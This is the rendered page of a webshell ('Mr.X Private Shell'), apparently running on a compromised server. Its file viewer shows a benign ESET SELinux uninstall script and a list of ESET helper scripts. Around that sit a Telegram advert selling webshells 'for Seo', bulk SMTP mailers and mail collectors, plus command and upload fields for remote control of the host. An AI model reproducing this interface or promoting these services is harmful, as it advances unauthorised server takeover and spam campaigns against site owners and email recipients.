__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
#!/bin/sh

SYSTEMD_CAT="`which systemd-cat 2>/dev/null || true`"

print_error() {
	errorstr="ESET Server Security selinux Error: $1"

	echo "$errorstr" 1>&2
	if [ -n "$SYSTEMD_CAT" ]; then
		echo -n "$errorstr" | $SYSTEMD_CAT -t "efs" -p err
	fi
}

if ! getenforce > /dev/null 2>&1; then
	exit 0
fi

# remove loaded policy
if semodule -l | grep '^eset_efs\>' > /dev/null 2>&1 && ! semodule -r eset_efs > /dev/null 2>&1; then
	print_error "Failed to remove policy eset_efs"
	print_error "Please remove old policy module manually with \"semodule -r eset_efs\"."
	exit 1
fi

# try to remove policy with old name for sure (can be needed during upgrade)
OLD_SELINUX_POLICY_NAME="efs"
if semodule -l | grep "^$OLD_SELINUX_POLICY_NAME\>" > /dev/null 2>&1 && ! semodule -r $OLD_SELINUX_POLICY_NAME > /dev/null 2>&1; then
	print_error "Failed to remove policy $OLD_SELINUX_POLICY_NAME"
	print_error "Please remove old policy module manually with \"semodule -r $OLD_SELINUX_POLICY_NAME\"."
	exit 1
fi

# relabel files after module unload
restorecon -RF /var/opt/eset/efs > /dev/null 2>&1
restorecon -RF /opt/eset/efs > /dev/null 2>&1
restorecon -RF /var/run/eset/efs > /dev/null 2>&1

exit 0

Filemanager

Name Type Size Permission Actions
check_start.sh File 3.85 KB 0755
configure.sh File 116 B 0755
efs_selinux_uninstall_check.sh File 1.15 KB 0755
eset_efs_sysctl.conf File 92 B 0644
eset_efs_sysctl.sh File 1.33 KB 0755
eset_efs_udev.sh File 738 B 0755
perform_app_update.sh File 2.01 KB 0755
register_service.sh File 880 B 0755
remove_certificates.sh File 865 B 0755
sign_modules.sh File 9.3 KB 0755
unconfigure.sh File 139 B 0755
unregister_service.sh File 720 B 0755
Filemanager